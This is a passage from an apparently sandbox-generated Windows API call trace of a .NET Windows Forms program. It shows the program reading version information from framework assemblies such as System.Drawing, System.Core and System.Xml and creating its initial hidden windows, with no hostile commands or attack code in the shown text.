lplpBuffer=0x3ae6c0*=0x0, puLen=0x3ae6bc) returned 0 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2444294, puLen=0x3ae6bc) returned 1 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x0, puLen=0x3ae6bc) returned 0 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x3ae6b4, puLen=0x3ae6b0 | out: lplpBuffer=0x3ae6b4*=0x24442e8, puLen=0x3ae6b0) returned 1 [0057.560] VerLanguageNameW (in: wLang=0x409, szLang=0x3ae444, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0057.560] VerQueryValueW (in: pBlock=0x2443f30, lpSubBlock="\\", lplpBuffer=0x3ae6c4, puLen=0x3ae6c0 | out: lplpBuffer=0x3ae6c4*=0x2443f58, puLen=0x3ae6c0) returned 1 [0057.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Drawing\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll", nBufferLength=0x105, lpBuffer=0x3ae21c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Drawing\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll", lpFilePart=0x0) returned 0x6b [0057.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae67c) returned 1 [0057.562] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Drawing\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.drawing\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\system.drawing.dll"), fInfoLevelId=0x0, lpFileInformation=0x3ae6f8 | out: lpFileInformation=0x3ae6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef914800, ftCreationTime.dwHighDateTime=0x1d0aa91, ftLastAccessTime.dwLowDateTime=0x67a6be20, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0xef914800, ftLastWriteTime.dwHighDateTime=0x1d0aa91, nFileSizeHigh=0x0, nFileSizeLow=0x912b0)) returned 1 [0057.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae678) returned 1 [0057.562] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Drawing\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll", lpdwHandle=0x3ae76c | out: lpdwHandle=0x3ae76c) returned 0x7bc [0057.577] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Drawing\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll", dwHandle=0x0, dwLen=0x7bc, lpData=0x24462f8 | out: lpData=0x24462f8) returned 1 [0057.578] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x3ae740, puLen=0x3ae73c | out: lplpBuffer=0x3ae740*=0x24466d0, puLen=0x3ae73c) returned 1 [0057.578] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24463b0, puLen=0x3ae6bc) returned 1 [0057.578] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2446404, puLen=0x3ae6bc) returned 1 [0057.578] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2446444, puLen=0x3ae6bc) returned 1 [0057.579] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24464a0, puLen=0x3ae6bc) returned 1 [0057.579] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24464ec, puLen=0x3ae6bc) returned 1 [0057.579] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2446574, puLen=0x3ae6bc) returned 1 [0057.579] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24465bc, puLen=0x3ae6bc) returned 1 [0057.579] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2446614, puLen=0x3ae6bc) returned 1 [0057.579] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2446640, puLen=0x3ae6bc) returned 1 [0057.579] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x0, puLen=0x3ae6bc) returned 0 [0057.579] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244667c, puLen=0x3ae6bc) returned 1 [0057.579] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x0, puLen=0x3ae6bc) returned 0 [0057.579] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x3ae6b4, puLen=0x3ae6b0 | out: lplpBuffer=0x3ae6b4*=0x24466d0, puLen=0x3ae6b0) returned 1 [0057.579] VerLanguageNameW (in: wLang=0x409, szLang=0x3ae444, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0057.579] VerQueryValueW (in: pBlock=0x24462f8, lpSubBlock="\\", lplpBuffer=0x3ae6c4, puLen=0x3ae6c0 | out: lplpBuffer=0x3ae6c4*=0x2446320, puLen=0x3ae6c0) returned 1 [0057.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Core\\v4.0_4.0.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x3ae21c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Core\\v4.0_4.0.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x65 [0057.580] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae67c) returned 1 [0057.580] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Core\\v4.0_4.0.0.0__b77a5c561934e089\\System.Core.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.core\\v4.0_4.0.0.0__b77a5c561934e089\\system.core.dll"), fInfoLevelId=0x0, lpFileInformation=0x3ae6f8 | out: lpFileInformation=0x3ae6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef914800, ftCreationTime.dwHighDateTime=0x1d0aa91, ftLastAccessTime.dwLowDateTime=0x61e08840, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0xef914800, ftLastWriteTime.dwHighDateTime=0x1d0aa91, nFileSizeHigh=0x0, nFileSizeLow=0x141ea0)) returned 1 [0057.580] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae678) returned 1 [0057.580] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Core\\v4.0_4.0.0.0__b77a5c561934e089\\System.Core.dll", lpdwHandle=0x3ae76c | out: lpdwHandle=0x3ae76c) returned 0x79c [0057.615] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Core\\v4.0_4.0.0.0__b77a5c561934e089\\System.Core.dll", dwHandle=0x0, dwLen=0x79c, lpData=0x24485f0 | out: lpData=0x24485f0) returned 1 [0057.616] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x3ae740, puLen=0x3ae73c | out: lplpBuffer=0x3ae740*=0x24489b8, puLen=0x3ae73c) returned 1 [0057.616] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24486a8, puLen=0x3ae6bc) returned 1 [0057.616] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24486fc, puLen=0x3ae6bc) returned 1 [0057.616] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244873c, puLen=0x3ae6bc) returned 1 [0057.616] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2448798, puLen=0x3ae6bc) returned 1 [0057.616] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24487dc, puLen=0x3ae6bc) returned 1 [0057.616] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2448864, puLen=0x3ae6bc) returned 1 [0057.616] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24488a4, puLen=0x3ae6bc) returned 1 [0057.616] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x24488fc, puLen=0x3ae6bc) returned 1 [0057.617] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2448928, puLen=0x3ae6bc) returned 1 [0057.617] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x0, puLen=0x3ae6bc) returned 0 [0057.617] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x2448964, puLen=0x3ae6bc) returned 1 [0057.617] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x0, puLen=0x3ae6bc) returned 0 [0057.617] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x3ae6b4, puLen=0x3ae6b0 | out: lplpBuffer=0x3ae6b4*=0x24489b8, puLen=0x3ae6b0) returned 1 [0057.617] VerLanguageNameW (in: wLang=0x409, szLang=0x3ae444, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0057.617] VerQueryValueW (in: pBlock=0x24485f0, lpSubBlock="\\", lplpBuffer=0x3ae6c4, puLen=0x3ae6c0 | out: lplpBuffer=0x3ae6c4*=0x2448618, puLen=0x3ae6c0) returned 1 [0057.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Configuration\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.Configuration.dll", nBufferLength=0x105, lpBuffer=0x3ae21c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Configuration\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.Configuration.dll", lpFilePart=0x0) returned 0x77 [0057.618] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae67c) returned 1 [0057.618] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Configuration\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.Configuration.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.configuration\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\system.configuration.dll"), fInfoLevelId=0x0, lpFileInformation=0x3ae6f8 | out: lpFileInformation=0x3ae6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef914800, ftCreationTime.dwHighDateTime=0x1d0aa91, ftLastAccessTime.dwLowDateTime=0x661475c0, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0xef914800, ftLastWriteTime.dwHighDateTime=0x1d0aa91, nFileSizeHigh=0x0, nFileSizeLow=0x624d0)) returned 1 [0057.618] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae678) returned 1 [0057.618] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Configuration\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.Configuration.dll", lpdwHandle=0x3ae76c | out: lpdwHandle=0x3ae76c) returned 0x814 [0057.630] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Configuration\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.Configuration.dll", dwHandle=0x0, dwLen=0x814, lpData=0x244c0c8 | out: lpData=0x244c0c8) returned 1 [0057.631] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x3ae740, puLen=0x3ae73c | out: lplpBuffer=0x3ae740*=0x244c4cc, puLen=0x3ae73c) returned 1 [0057.631] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244c180, puLen=0x3ae6bc) returned 1 [0057.631] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244c1d4, puLen=0x3ae6bc) returned 1 [0057.631] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244c228, puLen=0x3ae6bc) returned 1 [0057.631] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244c284, puLen=0x3ae6bc) returned 1 [0057.631] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244c2dc, puLen=0x3ae6bc) returned 1 [0057.631] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244c364, puLen=0x3ae6bc) returned 1 [0057.631] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244c3b8, puLen=0x3ae6bc) returned 1 [0057.631] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244c410, puLen=0x3ae6bc) returned 1 [0057.631] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244c43c, puLen=0x3ae6bc) returned 1 [0057.632] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x0, puLen=0x3ae6bc) returned 0 [0057.632] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244c478, puLen=0x3ae6bc) returned 1 [0057.632] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x0, puLen=0x3ae6bc) returned 0 [0057.632] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x3ae6b4, puLen=0x3ae6b0 | out: lplpBuffer=0x3ae6b4*=0x244c4cc, puLen=0x3ae6b0) returned 1 [0057.632] VerLanguageNameW (in: wLang=0x409, szLang=0x3ae444, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0057.632] VerQueryValueW (in: pBlock=0x244c0c8, lpSubBlock="\\", lplpBuffer=0x3ae6c4, puLen=0x3ae6c0 | out: lplpBuffer=0x3ae6c4*=0x244c0f0, puLen=0x3ae6c0) returned 1 [0057.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Xml\\v4.0_4.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x3ae21c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Xml\\v4.0_4.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x63 [0057.633] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae67c) returned 1 [0057.633] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Xml\\v4.0_4.0.0.0__b77a5c561934e089\\System.Xml.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.xml\\v4.0_4.0.0.0__b77a5c561934e089\\system.xml.dll"), fInfoLevelId=0x0, lpFileInformation=0x3ae6f8 | out: lpFileInformation=0x3ae6f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef914800, ftCreationTime.dwHighDateTime=0x1d0aa91, ftLastAccessTime.dwLowDateTime=0x6b38ce20, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0xef914800, ftLastWriteTime.dwHighDateTime=0x1d0aa91, nFileSizeHigh=0x0, nFileSizeLow=0x284698)) returned 1 [0057.633] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae678) returned 1 [0057.633] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Xml\\v4.0_4.0.0.0__b77a5c561934e089\\System.Xml.dll", lpdwHandle=0x3ae76c | out: lpdwHandle=0x3ae76c) returned 0x79c [0057.660] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Xml\\v4.0_4.0.0.0__b77a5c561934e089\\System.Xml.dll", dwHandle=0x0, dwLen=0x79c, lpData=0x244e458 | out: lpData=0x244e458) returned 1 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x3ae740, puLen=0x3ae73c | out: lplpBuffer=0x3ae740*=0x244e820, puLen=0x3ae73c) returned 1 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244e510, puLen=0x3ae6bc) returned 1 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244e564, puLen=0x3ae6bc) returned 1 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244e5a4, puLen=0x3ae6bc) returned 1 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244e600, puLen=0x3ae6bc) returned 1 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244e644, puLen=0x3ae6bc) returned 1 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244e6cc, puLen=0x3ae6bc) returned 1 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244e70c, puLen=0x3ae6bc) returned 1 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244e764, puLen=0x3ae6bc) returned 1 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244e790, puLen=0x3ae6bc) returned 1 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x0, puLen=0x3ae6bc) returned 0 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x244e7cc, puLen=0x3ae6bc) returned 1 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0x3ae6c0, puLen=0x3ae6bc | out: lplpBuffer=0x3ae6c0*=0x0, puLen=0x3ae6bc) returned 0 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x3ae6b4, puLen=0x3ae6b0 | out: lplpBuffer=0x3ae6b4*=0x244e820, puLen=0x3ae6b0) returned 1 [0057.662] VerLanguageNameW (in: wLang=0x409, szLang=0x3ae444, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0057.662] VerQueryValueW (in: pBlock=0x244e458, lpSubBlock="\\", lplpBuffer=0x3ae6c4, puLen=0x3ae6c0 | out: lplpBuffer=0x3ae6c4*=0x244e480, puLen=0x3ae6c0) returned 1 [0057.663] GetCurrentActCtx (in: lphActCtx=0x3ae6ec | out: lphActCtx=0x3ae6ec*=0x416cac) returned 1 [0057.663] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0057.664] GetCurrentActCtx (in: lphActCtx=0x3ae674 | out: lphActCtx=0x3ae674*=0x416cac) returned 1 [0057.664] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73cd0000 [0057.664] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0057.664] CreateWindowExW (dwExStyle=0x10000, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName="WindowsFormsParkingWindow", dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0xf70000, lpParam=0x0) returned 0x201f8 [0057.666] SetWindowLongW (hWnd=0x201f8, nIndex=-4, dwNewLong=1997940189) returned 5310438 [0057.666] GetWindowLongW (hWnd=0x201f8, nIndex=-4) returned 1997940189 [0057.666] SetWindowLongW (hWnd=0x201f8, nIndex=-4, dwNewLong=5310678) returned 1997940189 [0057.666] GetWindowLongW (hWnd=0x201f8, nIndex=-4) returned 5310678 [0057.666] GetWindowLongW (hWnd=0x201f8, nIndex=-16) returned 113311744 [0057.666] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f8, Msg=0x24, wParam=0x0, lParam=0x3ae114) returned 0x0 [0057.667] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f8, Msg=0x81, wParam=0x0, lParam=0x3ae108) returned 0x1 [0057.667] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f8, Msg=0x83, wParam=0x0, lParam=0x3ae0f4) returned 0x0 [0057.667] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f8, Msg=0x1, wParam=0x0, lParam=0x3ae108) returned 0x0 [0057.667] GetClientRect (in: hWnd=0x201f8, lpRect=0x3ade54 | out: lpRect=0x3ade54) returned 1 [0057.667] GetWindowRect (in: hWnd=0x201f8, lpRect=0x3ade54 | out: lpRect=0x3ade54) returned 1 [0057.667] SetWindowTextW (hWnd=0x201f8, lpString="WindowsFormsParkingWindow") returned 1 [0057.667] CallWindowProcW (lpPrevWndFunc=0x771625dd, hWnd=0x201f8, Msg=0xc, wParam=0x0, lParam=0x24525b4) returned 0x1 [0057.668] GetParent (hWnd=0x201f8) returned 0x0 [0057.668] GetClassInfoW (in: hInstance=0x0, lpClassName="STATIC", lpWndClass=0x2452844 | out: lpWndClass=0x2452844) returned 1 [0057.669] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0057.669] CoTaskMemAlloc (cb=0x58) returned 0x6b44580 [0057.669] RegisterClassW (lpWndClass=0x3ae5a4) returned 0xc13f [0057.669] CoTaskMemFree (pv=0x6b44580) [0057.670] GetModuleHandleW (lpModuleName=0x0) returned 0xf70000 [0057.670] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.STATIC.app.0.141b42a_r14_ad1", lpWindowName=0x0, dwStyle=0x5600000d, X=0, Y=0, nWidth=100, nHeight=23, hWndParent=0x201f8, 